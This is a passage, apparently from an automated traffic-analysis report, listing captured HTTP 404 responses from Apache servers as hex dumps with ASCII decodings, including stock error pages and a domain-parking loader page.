e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00 Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:34:56 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 01 Mar 2021 15:47:38 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 358Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00 Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:34:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 01 Mar 2021 15:47:38 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:35:13 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:35:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:35:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:35:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:35:27 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 690X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:35:30 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 690X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:35:32 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 690X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:35:35 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 690X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></htm
